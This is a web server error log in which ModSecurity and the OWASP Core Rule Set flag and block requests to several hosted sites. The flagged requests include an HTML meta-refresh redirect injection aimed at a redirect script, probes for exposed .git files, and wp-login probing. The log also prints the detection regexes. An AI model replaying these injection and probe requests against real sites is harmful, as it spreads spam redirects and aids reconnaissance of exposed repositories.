[Mon May 11 19:56:03.882115 2026] [security2:error] [pid 1516058:tid 1516113] [client 27.78.84.116:56115] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMyMeXtzav-mi9SycggAAANc"]
[Mon May 11 19:56:03.882508 2026] [security2:error] [pid 1516058:tid 1516113] [client 27.78.84.116:56115] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMyMeXtzav-mi9SycggAAANc"]
[Mon May 11 19:56:03.883015 2026] [security2:error] [pid 1516058:tid 1516113] [client 27.78.84.116:56115] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMyMeXtzav-mi9SycggAAANc"]
[Mon May 11 19:56:03.883479 2026] [security2:error] [pid 1516058:tid 1516113] [client 27.78.84.116:56115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMyMeXtzav-mi9SycggAAANc"]
[Mon May 11 19:56:03.884981 2026] [security2:error] [pid 1516058:tid 1516113] [client 27.78.84.116:56115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYMyMeXtzav-mi9SycggAAANc"]
[Mon May 11 19:56:04.371899 2026] [ssl:error] [pid 1511173:tid 1511198] (EAI 2)Name or service not known: [client 51.68.236.70:21773] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:56:04.372095 2026] [ssl:error] [pid 1511173:tid 1511198] AH01941: stapling_renew_response: responder error
[Mon May 11 19:56:15.994777 2026] [security2:error] [pid 1511173:tid 1511190] [client 92.208.199.142:38761] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: dd87d91a0cdac4bb5d1233643577b8ce||1778523869||1778523509"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agIYP_jVc-A-CSptvm1euwAAAE4"], referer: https://www.google.com/
[Mon May 11 19:56:15.995016 2026] [security2:error] [pid 1511173:tid 1511190] [client 92.208.199.142:38761] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agIYP_jVc-A-CSptvm1euwAAAE4"], referer: https://www.google.com/
[Mon May 11 19:56:16.004945 2026] [security2:error] [pid 1511173:tid 1511190] [client 92.208.199.142:38761] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agIYP_jVc-A-CSptvm1euwAAAE4"], referer: https://www.google.com/
[Mon May 11 19:56:18.412865 2026] [security2:error] [pid 1511173:tid 1511190] [client 92.208.199.142:38761] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: dd87d91a0cdac4bb5d1233643577b8ce||1778523869||1778523509"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agIYQvjVc-A-CSptvm1evwAAAE4"], referer: https://www.google.com/
[Mon May 11 19:56:18.413097 2026] [security2:error] [pid 1511173:tid 1511190] [client 92.208.199.142:38761] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agIYQvjVc-A-CSptvm1evwAAAE4"], referer: https://www.google.com/
[Mon May 11 19:56:18.413360 2026] [security2:error] [pid 1511173:tid 1511190] [client 92.208.199.142:38761] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agIYQvjVc-A-CSptvm1evwAAAE4"], referer: https://www.google.com/
[Mon May 11 19:56:20.399939 2026] [security2:error] [pid 1501883:tid 1501885] [client 43.131.243.61:59138] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2026/01/Roue-Libre-extrait-site-1.mp3"] [unique_id "agIYRDP5Q_-MBliRCAxTxQAAAAA"]
[Mon May 11 19:56:31.182122 2026] [security2:error] [pid 1501831:tid 1501843] [client 93.123.109.79:64469] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agIYT1NddpkriGUb6ZVidQAAAQo"]
[Mon May 11 19:56:31.182599 2026] [security2:error] [pid 1501831:tid 1501843] [client 93.123.109.79:64469] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agIYT1NddpkriGUb6ZVidQAAAQo"]
[Mon May 11 19:56:31.183078 2026] [security2:error] [pid 1501831:tid 1501843] [client 93.123.109.79:64469] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agIYT1NddpkriGUb6ZVidQAAAQo"]
[Mon May 11 19:56:31.241648 2026] [security2:error] [pid 1511173:tid 1511192] [client 93.123.109.79:57068] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/HEAD"] [unique_id "agIYT_jVc-A-CSptvm1e1QAAAFA"]
[Mon May 11 19:56:31.241816 2026] [security2:error] [pid 1511173:tid 1511192] [client 93.123.109.79:57068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/HEAD"] [unique_id "agIYT_jVc-A-CSptvm1e1QAAAFA"]
[Mon May 11 19:56:31.242019 2026] [security2:error] [pid 1511173:tid 1511192] [client 93.123.109.79:57068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/HEAD"] [unique_id "agIYT_jVc-A-CSptvm1e1QAAAFA"]
[Mon May 11 19:56:36.689654 2026] [security2:error] [pid 1534836:tid 1534893] [client 18.232.12.157:17054] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:php echo BASEFRONT ?>flash/afficheFormation.php?formation. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:php echo BASEFRONT ?>flash/afficheFormation.php?formation: <?php echo $formationid ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIYVNeaRXe5lR8y0ZN_9gAAAVY"]
[Mon May 11 19:56:36.690222 2026] [security2:error] [pid 1534836:tid 1534893] [client 18.232.12.157:17054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIYVNeaRXe5lR8y0ZN_9gAAAVY"]
[Mon May 11 19:56:36.797090 2026] [security2:error] [pid 1534836:tid 1534893] [client 18.232.12.157:17054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIYVNeaRXe5lR8y0ZN_9gAAAVY"]
[Mon May 11 19:56:50.070814 2026] [security2:error] [pid 1516058:tid 1516103] [client 43.157.153.236:48752] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIYYiMeXtzav-mi9SycsQAAAM0"]
[Mon May 11 19:57:01.956257 2026] [security2:error] [pid 1501831:tid 1501835] [client 129.226.146.42:55702] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agIYbVNddpkriGUb6ZVilwAAAQI"]
[Mon May 11 19:57:08.777348 2026] [security2:error] [pid 1501883:tid 1501905] [client 129.226.146.42:46058] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agIYdDP5Q_-MBliRCAxUAQAAABQ"], referer: http://letamsgarage.fr
[Mon May 11 19:57:41.568140 2026] [:error] [pid 1502013:tid 1502060] [client 80.90.183.146:53894] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com
[Mon May 11 19:57:41.989290 2026] [:error] [pid 1501883:tid 1501909] [client 80.90.183.146:53916] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com/wp-login.php?action=register
[Mon May 11 19:57:45.357689 2026] [security2:error] [pid 1511173:tid 1511192] [client 43.157.98.187:51552] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpc-entreprises.com"] [uri "/"] [unique_id "agIYmfjVc-A-CSptvm1fJAAAAFA"]
[Mon May 11 19:57:46.559391 2026] [security2:error] [pid 1502013:tid 1502049] [client 43.157.98.187:34756] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpc-entreprises.com"] [uri "/"] [unique_id "agIYmpYn-x0CHsbEbP2ZUgAAAJc"], referer: http://cpc-entreprises.com
[Mon May 11 19:58:14.925207 2026] [autoindex:error] [pid 1534836:tid 1534886] [client 3.131.220.121:54444] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 19:58:24.523776 2026] [security2:error] [pid 1501883:tid 1501905] [client 3.235.215.92:56977] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS_NAMES:php echo BASEFRONT ?>img/formation/maia/miniature/<?php echo $image ?>. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS_NAMES:php echo BASEFRONT ?>img/formation/maia/miniature/<?php echo $image ?>: php echo basefront ?>img/formation/maia/miniature/<?php echo $image ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIYwDP5Q_-MBliRCAxUSwAAABQ"]
[Mon May 11 19:58:24.524336 2026] [security2:error] [pid 1501883:tid 1501905] [client 3.235.215.92:56977] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIYwDP5Q_-MBliRCAxUSwAAABQ"]
[Mon May 11 19:58:24.667829 2026] [security2:error] [pid 1501883:tid 1501905] [client 3.235.215.92:56977] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIYwDP5Q_-MBliRCAxUSwAAABQ"]
[Mon May 11 19:58:28.405132 2026] [security2:error] [pid 1534836:tid 1534881] [client 34.105.147.8:46852] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agIYxNeaRXe5lR8y0ZOAcgAAAUo"]
[Mon May 11 19:58:28.405835 2026] [security2:error] [pid 1534836:tid 1534881] [client 34.105.147.8:46852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agIYxNeaRXe5lR8y0ZOAcgAAAUo"]
[Mon May 11 19:58:31.155625 2026] [security2:error] [pid 1534836:tid 1534881] [client 34.105.147.8:46852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agIYxNeaRXe5lR8y0ZOAcgAAAUo"]
